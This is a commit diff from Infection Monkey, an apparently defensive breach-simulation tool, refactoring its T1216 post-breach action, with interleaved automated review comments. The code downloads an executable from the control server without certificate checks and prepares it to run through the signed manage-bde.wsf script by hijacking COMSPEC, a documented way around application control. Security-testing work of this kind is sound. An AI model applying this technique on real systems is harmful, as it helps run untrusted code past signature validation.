CR changes
This commit is contained in:
parent
984a8c2251
commit
989286857b
|
@ -0,0 +1 @@
|
|||
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'
|
|
@ -2,12 +2,14 @@ import json
|
|||
import logging
|
||||
import platform
|
||||
from socket import gethostname
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
from requests.exceptions import ConnectionError
|
||||
|
||||
import infection_monkey.monkeyfs as monkeyfs
|
||||
import infection_monkey.tunnel as tunnel
|
||||
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
||||
from infection_monkey.config import GUID, WormConfiguration
|
||||
from infection_monkey.network.info import check_internet_access, local_ips
|
||||
from infection_monkey.transport.http import HTTPConnectProxy
|
||||
|
@ -328,7 +330,8 @@ class ControlClient(object):
|
|||
@staticmethod
|
||||
def get_T1216_pba_file():
|
||||
try:
|
||||
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
|
||||
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
|
||||
T1216_PBA_FILE_DOWNLOAD_PATH),
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies,
|
||||
stream=True)
|
||||
|
|
|
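Review bot: get_T1216_pba_file still hands back whatever requests.get returns without checking the HTTP status, so an island error response would be passed to the caller as if it were the file to run; the consumer in the signed-script helper (the hunk that writes `download.content` to TEMP_COMSPEC) has the same gap, so fixing it here covers both. Bind and check before returning: `response = requests.get(...)`, `response.raise_for_status()`, `return response`. The `except` clause of this try block lies outside the hunk and the module imports only ConnectionError from requests.exceptions, so confirm HTTPError is handled there as well. Minor: T1216_PBA_FILE_DOWNLOAD_PATH starts with `/`, so urljoin discards the base path anyway and the trailing slash in the f-string base is not needed, though harmless.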
@ -1,3 +1,4 @@
|
|||
import logging
|
||||
import subprocess
|
||||
|
||||
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
||||
|
@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
|
|||
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SignedScriptProxyExecution(PBA):
|
||||
def __init__(self):
|
||||
|
@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
|
|||
windows_cmd=' '.join(windows_cmds))
|
||||
|
||||
def run(self):
|
||||
try:
|
||||
original_comspec = ''
|
||||
if is_windows_os():
|
||||
original_comspec =\
|
||||
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||
|
||||
super().run()
|
||||
|
||||
except Exception as e:
|
||||
LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
|
||||
finally:
|
||||
cleanup_changes(original_comspec)
|
||||
|
|
|
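Review bot: The new `except Exception` branch in run() logs only `str(e)` through an f-string, which loses the traceback and formats eagerly; `LOG.exception("An exception occurred on running PBA %s", POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC)` keeps the stack trace and uses the logging module's lazy %-formatting. Because `original_comspec` is captured inside the `try`, a failure in `subprocess.check_output` leaves it as `''` and the `finally` still calls `cleanup_changes('')`; cleanup_changes is outside this view, so confirm it treats an empty value as "nothing to restore" rather than overwriting COMSPEC. A short comment on the `finally`, e.g. `# restore COMSPEC even when the PBA itself failed`, would make that intent explicit.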
@ -1,5 +1,4 @@
|
|||
import os
|
||||
import subprocess
|
||||
|
||||
from infection_monkey.control import ControlClient
|
||||
|
||||
|
@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
|
|||
|
||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||
download = ControlClient.get_T1216_pba_file()
|
||||
with open(TEMP_COMSPEC, 'wb') as file_obj:
|
||||
file_obj.write(download.content)
|
||||
file_obj.flush()
|
||||
with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
|
||||
random_exe_obj.write(download.content)
|
||||
random_exe_obj.flush()
|
||||
|
||||
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||
windir_path = os.environ['WINDIR']
|
||||
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
|
||||
|
||||
return [
|
||||
|
|
|
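Review bot: `os.environ['WINDIR']` raises KeyError when the variable is unset, whereas the removed `echo %WINDIR%` call produced literal text, so the failure mode changes silently; the KeyError now propagates to the caller, and `os.environ.get('WINDIR')` followed by an explicit check would make that expectation visible. The response from get_T1216_pba_file is fetched with stream=True, yet only `.content` is read here and the response is never closed; `with ControlClient.get_T1216_pba_file() as download:` releases the connection when the block ends. The explicit `random_exe_obj.flush()` is redundant because leaving the `with` block closes, and therefore flushes, the file. The body of get_windows_commands_to_proxy_execution_using_signed_script continues past the hunk.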
@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
|
|||
from werkzeug.exceptions import NotFound
|
||||
|
||||
import monkey_island.cc.environment.environment_singleton as env_singleton
|
||||
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
||||
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
|
||||
from monkey_island.cc.database import database, mongo
|
||||
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
|
||||
|
@ -132,7 +133,7 @@ def init_api_resources(api):
|
|||
api.add_resource(Log, '/api/log', '/api/log/')
|
||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
|
||||
api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
|
||||
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||
|
|
|
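Review bot: T1216PBAFileDownload is now registered only at T1216_PBA_FILE_DOWNLOAD_PATH, which has no trailing slash, while the removed route was `/api/t1216-pba/download/`; under Werkzeug's default strict-slashes matching a request to the old trailing-slash URL no longer matches this rule, so agents built before this change will be refused by an updated island. The Log and IslandLog registrations a few lines above accept both forms; doing the same here, `api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH, T1216_PBA_FILE_DOWNLOAD_PATH + '/')`, keeps the endpoint reachable from either URL. The rest of init_api_resources is outside the hunk.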
@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
|
|||
class T1216(PostBreachTechnique):
|
||||
tech_id = "T1216"
|
||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script since it didn't run on any Windows machines."
|
||||
"pre-existing signed script since it didn't run on any Windows machines. " +\
|
||||
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script on Windows but failed."
|
||||
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
|
||||
"pre-existing signed script on Windows but failed. " +\
|
||||
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
|
||||
"This behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
||||
|
|
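Review bot: The three message attributes build their text with `+\` line continuations, which is fragile (any character after the backslash is a syntax error) and repeats the sentence "could be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems." three times. Wrapping each value in parentheses and relying on implicit adjacent-string concatenation removes the backslashes, and hoisting the repeated sentence into one module-level constant lets a future wording change happen in one place.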